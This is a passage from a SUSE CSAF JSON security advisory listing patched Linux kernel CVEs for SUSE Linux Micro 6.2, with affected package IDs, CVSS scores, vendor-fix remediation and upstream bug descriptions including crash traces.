"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68359",
"url": "https://www.suse.com/security/cve/CVE-2025-68359"
},
{
"category": "external",
"summary": "SUSE Bug 1255542 for CVE-2025-68359",
"url": "https://bugzilla.suse.com/1255542"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68359"
},
{
"cve": "CVE-2025-68360",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68360"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mt76: wed: use proper wed reference in mt76 wed driver callabacks\n\nMT7996 driver can use both wed and wed_hif2 devices to offload traffic\nfrom/to the wireless NIC. In the current codebase we assume to always\nuse the primary wed device in wed callbacks resulting in the following\ncrash if the hw runs wed_hif2 (e.g. 6GHz link).\n\n[ 297.455876] Unable to handle kernel read from unreadable memory at virtual address 000000000000080a\n[ 297.464928] Mem abort info:\n[ 297.467722] ESR = 0x0000000096000005\n[ 297.471461] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 297.476766] SET = 0, FnV = 0\n[ 297.479809] EA = 0, S1PTW = 0\n[ 297.482940] FSC = 0x05: level 1 translation fault\n[ 297.487809] Data abort info:\n[ 297.490679] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000\n[ 297.496156] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 297.501196] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 297.506500] user pgtable: 4k pages, 39-bit VAs, pgdp=0000000107480000\n[ 297.512927] [000000000000080a] pgd=08000001097fb003, p4d=08000001097fb003, pud=08000001097fb003, pmd=0000000000000000\n[ 297.523532] Internal error: Oops: 0000000096000005 [#1] SMP\n[ 297.715393] CPU: 2 UID: 0 PID: 45 Comm: kworker/u16:2 Tainted: G O 6.12.50 #0\n[ 297.723908] Tainted: [O]=OOT_MODULE\n[ 297.727384] Hardware name: Banana Pi BPI-R4 (2x SFP+) (DT)\n[ 297.732857] Workqueue: nf_ft_offload_del nf_flow_rule_route_ipv6 [nf_flow_table]\n[ 297.740254] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 297.747205] pc : mt76_wed_offload_disable+0x64/0xa0 [mt76]\n[ 297.752688] lr : mtk_wed_flow_remove+0x58/0x80\n[ 297.757126] sp : ffffffc080fe3ae0\n[ 297.760430] x29: ffffffc080fe3ae0 x28: ffffffc080fe3be0 x27: 00000000deadbef7\n[ 297.767557] x26: ffffff80c5ebca00 x25: 0000000000000001 x24: ffffff80c85f4c00\n[ 297.774683] x23: ffffff80c1875b78 x22: ffffffc080d42cd0 x21: ffffffc080660018\n[ 297.781809] x20: ffffff80c6a076d0 x19: ffffff80c6a043c8 x18: 0000000000000000\n[ 297.788935] x17: 0000000000000000 x16: 0000000000000001 x15: 0000000000000000\n[ 297.796060] x14: 0000000000000019 x13: ffffff80c0ad8ec0 x12: 00000000fa83b2da\n[ 297.803185] x11: ffffff80c02700c0 x10: ffffff80c0ad8ec0 x9 : ffffff81fef96200\n[ 297.810311] x8 : ffffff80c02700c0 x7 : ffffff80c02700d0 x6 : 0000000000000002\n[ 297.817435] x5 : 0000000000000400 x4 : 0000000000000000 x3 : 0000000000000000\n[ 297.824561] x2 : 0000000000000001 x1 : 0000000000000800 x0 : ffffff80c6a063c8\n[ 297.831686] Call trace:\n[ 297.834123] mt76_wed_offload_disable+0x64/0xa0 [mt76]\n[ 297.839254] mtk_wed_flow_remove+0x58/0x80\n[ 297.843342] mtk_flow_offload_cmd+0x434/0x574\n[ 297.847689] mtk_wed_setup_tc_block_cb+0x30/0x40\n[ 297.852295] nf_flow_offload_ipv6_hook+0x7f4/0x964 [nf_flow_table]\n[ 297.858466] nf_flow_rule_route_ipv6+0x438/0x4a4 [nf_flow_table]\n[ 297.864463] process_one_work+0x174/0x300\n[ 297.868465] worker_thread+0x278/0x430\n[ 297.872204] kthread+0xd8/0xdc\n[ 297.875251] ret_from_fork+0x10/0x20\n[ 297.878820] Code: 928b5ae0 8b000273 91400a60 f943fa61 (79401421)\n[ 297.884901] ---[ end trace 0000000000000000 ]---\n\nFix the issue detecting the proper wed reference to use running wed\ncallabacks.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68360",
"url": "https://www.suse.com/security/cve/CVE-2025-68360"
},
{
"category": "external",
"summary": "SUSE Bug 1255536 for CVE-2025-68360",
"url": "https://bugzilla.suse.com/1255536"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68360"
},
{
"cve": "CVE-2025-68361",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68361"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: limit the level of fs stacking for file-backed mounts\n\nOtherwise, it could cause potential kernel stack overflow (e.g., EROFS\nmounting itself).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68361",
"url": "https://www.suse.com/security/cve/CVE-2025-68361"
},
{
"category": "external",
"summary": "SUSE Bug 1255526 for CVE-2025-68361",
"url": "https://bugzilla.suse.com/1255526"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68361"
},
{
"cve": "CVE-2025-68366",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68366"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config unlock in nbd_genl_connect\n\nThere is one use-after-free warning when running NBD_CMD_CONNECT and\nNBD_CLEAR_SOCK:\n\nnbd_genl_connect\n nbd_alloc_and_init_config // config_refs=1\n nbd_start_device // config_refs=2\n set NBD_RT_HAS_CONFIG_REF\t\t\topen nbd // config_refs=3\n recv_work done // config_refs=2\n\t\t\t\t\t\tNBD_CLEAR_SOCK // config_refs=1\n\t\t\t\t\t\tclose nbd // config_refs=0\n refcount_inc -\u003e uaf\n\n------------[ cut here ]------------\nrefcount_t: addition on 0; use-after-free.\nWARNING: CPU: 24 PID: 1014 at lib/refcount.c:25 refcount_warn_saturate+0x12e/0x290\n nbd_genl_connect+0x16d0/0x1ab0\n genl_family_rcv_msg_doit+0x1f3/0x310\n genl_rcv_msg+0x44a/0x790\n\nThe issue can be easily reproduced by adding a small delay before\nrefcount_inc(\u0026nbd-\u003econfig_refs) in nbd_genl_connect():\n\n mutex_unlock(\u0026nbd-\u003econfig_lock);\n if (!ret) {\n set_bit(NBD_RT_HAS_CONFIG_REF, \u0026config-\u003eruntime_flags);\n+ printk(\"before 